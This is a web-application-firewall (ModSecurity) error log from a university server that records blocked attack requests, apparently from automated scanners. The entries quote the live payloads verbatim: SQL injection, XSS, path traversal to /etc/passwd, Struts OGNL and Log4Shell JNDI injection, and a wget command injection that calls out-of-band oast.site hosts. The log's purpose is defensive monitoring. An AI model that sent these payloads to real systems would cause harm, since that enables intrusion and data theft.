[Mon Aug 28 11:26:39.526882 2023] [:error] [pid 41337] [client 209.126.80.254] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\A|[^\\\\d])0x[a-f\\\\d]{3,}[a-f\\\\d]*)+" at ARGS:c. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "55"] [id "981260"] [rev "2"] [msg "SQL Hex Encoding Identified"] [data "Matched Data: w0XDB8AA found within ARGS:c: AWYlDCw9Ng4tOT1HLWcXQD4QdAAoAAgCAlwQHCwTBAIVPRgNLC0ADhYMDw0XDB8AAlg5CCwTPUoDLhBHFz0MDwADGxs="] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/assets/files/2020/12/index.php"] [unique_id "ZOwh-8Co-f0AAKF54U0AAAAV"]
[Mon Aug 28 11:26:39.542457 2023] [:error] [pid 41311] [client 209.126.80.254] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\A|[^\\\\d])0x[a-f\\\\d]{3,}[a-f\\\\d]*)+" at ARGS:c. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "55"] [id "981260"] [rev "2"] [msg "SQL Hex Encoding Identified"] [data "Matched Data: w0XDB8AA found within ARGS:c: AWYlDCw9Ng4tOT1HLWcXQD4QdAAoAAgCAlwQHCwTBAIVPRgNLC0ADhYMDw0XDB8AAlg5CCwTPUoDLhBHFz0MDwADGxs="] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/assets/files/2020/12/index.php"] [unique_id "ZOwh-8Co-f0AAKFfxcMAAAAG"]
[Mon Aug 28 11:28:41.829008 2023] [:error] [pid 41336] [client 209.126.80.254] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\A|[^\\\\d])0x[a-f\\\\d]{3,}[a-f\\\\d]*)+" at ARGS:alfa3. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "55"] [id "981260"] [rev "2"] [msg "SQL Hex Encoding Identified"] [data "Matched Data: U0XA15eB found within ARGS:alfa3: AAA6EhQtWhIqHAdHFQcbXz4QfAodMGImHnUuWSwDNhAVPWQPBD0pEC05Ik4EOSERBwBXNg0 E18VAx9bCjB9MgQUE1UsZRBZFwcDHS0tEwEuSAdIHwcLRikTFA4BKSpTCgUEVwYQIUQADx8RBBBnBSxlE1AHOhsHFjIxDy9JG0gGPQMdL2Z4ShQ9VkgeByEDLgMLADsTfBIXDwgdFwATHSpmLRwoLTILBD09DS4MEwcUAzoOLVgtECwTPgkCBy5XOWUlACwAZx8CahQfAgMbByguZA0vAxgfAy51OQ49DB0eKSYMAgEPWC06C0ATEj1IFx8EHgJhdkIKBS4QBS4tSCwiAwsVBwMHKRMbDi0iKQ4tEFtZLQMfQDg8GwwpED5dK2d/BBsTBxkWORxTGEo9LRkCDBAbEXQvGhMiTgcQLkcGEhdAPh8bAwQSGD0HdBQfFGYXBAUsBxQuF..."] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/assets/files/2020/12/index.php"] [unique_id "ZOwiecCo-f0AAKF4NpkAAAAT"]
[Tue Aug 29 11:21:18.213161 2023] [:error] [pid 721] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:a. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22);</ found within ARGS:a: <script>alert(\\x22XSS\\x22);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/"] [unique_id "ZO1yPsCo-f0AAALRG9IAAAAQ"]
[Tue Aug 29 11:21:18.758494 2023] [:error] [pid 721] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:s. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22);</ found within ARGS:s: <script>alert(\\x22XSS\\x22);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/"] [unique_id "ZO1yPsCo-f0AAALRG9MAAAAQ"]
[Tue Aug 29 11:30:11.262003 2023] [:error] [pid 908] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:props_doctor_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:props_doctor_id: 1,2) AND (SELECT 42 FROM (SELECT(SLEEP(6)))b"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10U8Co-f0AAAOM4TUAAAAU"]
[Tue Aug 29 11:30:11.373105 2023] [:error] [pid 906] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:uri. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ' found within ARGS:uri: {{228*'98'}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repositoryfh.unla.ac.id"] [uri "/actions/seomatic/meta-container/meta-link-container/"] [unique_id "ZO10U8Co-f0AAAOKNk4AAAAK"]
[Tue Aug 29 11:30:11.881318 2023] [:error] [pid 908] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:uri. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ' found within ARGS:uri: {{228*'98'}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repositoryfh.unla.ac.id"] [uri "/actions/seomatic/meta-container/all-meta-containers"] [unique_id "ZO10U8Co-f0AAAOM4TgAAAAU"]
[Tue Aug 29 11:30:12.739126 2023] [:error] [pid 971] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ][]=& found within ARGS:query: app=Common&model=Schedule&method=runSchedule&id[status]=1&id[method]=Schedule->_validationFieldItem&id[4]=function&[6][]=&id[0]=cmd&id[1]=assert&id[args]=cmd=system(ver)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10VMCo-f0AAAPLwA8AAAAX"]
[Tue Aug 29 11:30:13.404589 2023] [:error] [pid 865] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ][]=& found within ARGS:query: app=Common&model=Schedule&method=runSchedule&id[status]=1&id[method]=Schedule->_validationFieldItem&id[4]=function&[6][]=&id[0]=cmd&id[1]=assert&id[args]=cmd=system(id)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10VcCo-f0AAANh1oQAAAAA"]
[Tue Aug 29 11:30:14.426980 2023] [:error] [pid 972] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:pagina. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../../../ found within ARGS:pagina: ../../../../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/i3geo/exemplos/codemirror.php"] [unique_id "ZO10VsCo-f0AAAPMl9QAAAAY"]
[Tue Aug 29 11:30:15.377523 2023] [:error] [pid 983] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:user_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:user_id: 11 UNION ALL SELECT NULL,CONCAT(1,md5(999999999),1),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10V8Co-f0AAAPXAiIAAAAi"]
[Tue Aug 29 11:30:15.383753 2023] [:error] [pid 965] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: %{(# found within ARGS:name: %{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#q=(44660*44784)).(#q)}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/integration/saveGangster.action"] [unique_id "ZO10V8Co-f0AAAPFPgAAAAAR"]
[Tue Aug 29 11:30:16.353100 2023] [:error] [pid 920] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:{\\\\"url\\\\":\\\\"http://cjmn8l5jmimk2adbbnlghyjrthha9bd3u.oast.site\\\\"}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: : found within ARGS_NAMES:{\\x5c\\x5c\\x22url\\x5c\\x5c\\x22:\\x5c\\x5c\\x22http://cjmn8l5jmimk2adbbnlghyjrthha9bd3u.oast.site\\x5c\\x5c\\x22}: {\\x5c\\x22url\\x5c\\x22:\\x5c\\x22http://cjmn8l5jmimk2adbbnlghyjrthha9bd3u.oast.site\\x5c\\x22}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-json/visualizer/v1/upload-data"] [unique_id "ZO10WMCo-f0AAAOYZhkAAAAB"]
[Tue Aug 29 11:30:17.618160 2023] [:error] [pid 965] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:debit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  (9277=9277 found within ARGS:debit: (CASE WHEN (9277=9277) THEN SLEEP(6) ELSE 9277 END)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10WcCo-f0AAAPFPgcAAAAR"]
[Tue Aug 29 11:30:19.625924 2023] [:error] [pid 983] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:start_hour. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:start_hour: ;id;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/cgi-bin/nightled.cgi"] [unique_id "ZO10W8Co-f0AAAPXAjAAAAAi"]
[Tue Aug 29 11:30:20.539714 2023] [:error] [pid 977] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wpas_keys. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')/**/ found within ARGS:wpas_keys: 1')/**/AND/**/(SELECT/**/5202/**/FROM/**/(SELECT(SLEEP(6)))yRVR)/**/AND/**/('dwQZ'/**/LIKE/**/'dwQZ"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-content/plugins/wp-autosuggest/autosuggest.php"] [unique_id "ZO10XMCo-f0AAAPRNZoAAAAf"]
[Tue Aug 29 11:30:22.356602 2023] [:error] [pid 975] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:searchField. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  --  found within ARGS:searchField: antani' union select (select concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d) limit 0,1),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL -- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/devices.inc.php"] [unique_id "ZO10XsCo-f0AAAPPSuIAAAAd"]
[Tue Aug 29 11:30:22.518851 2023] [:error] [pid 983] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:ipAddress. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:ipAddress: `/bin/wget http:/cjmn8l5jmimk2adbbnlgxcenurtcn14ni.oast.site`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/Collector/diagnostics/ping"] [unique_id "ZO10XsCo-f0AAAPXAkQAAAAi"]
[Tue Aug 29 11:30:23.320016 2023] [:error] [pid 889] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:email. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: sleep( found within ARGS:email: 1' or sleep(6)#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/forgot_password.php"] [unique_id "ZO10X8Co-f0AAAN5YIIAAAAN"]
[Tue Aug 29 11:30:23.339577 2023] [:error] [pid 889] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:USERNAME. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: `;-- - found within ARGS:USERNAME: ')or`1`=`1`;-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/account/index.php"] [unique_id "ZO10X8Co-f0AAAN5YIMAAAAN"]
[Tue Aug 29 11:30:24.330631 2023] [:error] [pid 975] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:post_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:post_id: 1 AND (SELECT 1626 FROM (SELECT(SLEEP(6)))niPH)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10YMCo-f0AAAPPSucAAAAd"]
[Tue Aug 29 11:30:24.331922 2023] [:error] [pid 908] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:USERNAME. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: `;-- - found within ARGS:USERNAME: ')or`1`=`1`;-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/opensis/index.php"] [unique_id "ZO10YMCo-f0AAAOM4VgAAAAU"]
[Tue Aug 29 11:30:25.601418 2023] [:error] [pid 902] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:USERNAME. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: `;-- - found within ARGS:USERNAME: ')or`1`=`1`;-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10YcCo-f0AAAOGafsAAAAS"]
[Tue Aug 29 11:30:25.604844 2023] [:error] [pid 906] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:username: ${jndi:ldap://${:-239}${:-529}.${hostName}.username.cjmn8l5jmimk2adbbnlgs9ekj35kdb8ai.oast.site/test}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/"] [unique_id "ZO10YcCo-f0AAAOKNm8AAAAK"]
[Tue Aug 29 11:30:26.320551 2023] [:error] [pid 974] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:ant. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:ant: echo md5(\\x22antproxy.php\\x22);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/.antproxy.php"] [unique_id "ZO10YsCo-f0AAAPOhYcAAAAa"]
[Tue Aug 29 11:30:28.396557 2023] [:error] [pid 867] [client 143.42.78.27] ModSecurity: Rule 7fe1ce5b6070 [id "981173"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "159"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "repositoryfh.unla.ac.id"] [uri "/CTCWebService/CTCWebServiceBean/ConfigServlet"] [unique_id "ZO10ZMCo-f0AAANjpyAAAAAT"]
[Tue Aug 29 11:30:28.406476 2023] [:error] [pid 867] [client 143.42.78.27] ModSecurity: Rule 7fe1c58deef8 [id "973302"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"][line "309"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "repositoryfh.unla.ac.id"] [uri "/CTCWebService/CTCWebServiceBean/ConfigServlet"] [unique_id "ZO10ZMCo-f0AAANjpyAAAAAT"]
[Tue Aug 29 11:30:29.328911 2023] [:error] [pid 903] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:categoryId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'zzz'='zzz found within ARGS:categoryId: 1' and updatexml(1,concat(0x7e,md5(999999999),0x7e),1) and 'zzz'='zzz"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/cms/content/list"] [unique_id "ZO10ZcCo-f0AAAOH4TIAAAAH"]
[Tue Aug 29 11:30:30.398815 2023] [:error] [pid 975] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ');${ found within ARGS:page: index');${system('echo lotuscms_rce | md5sum')};#\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10ZsCo-f0AAAPPSvgAAAAd"]
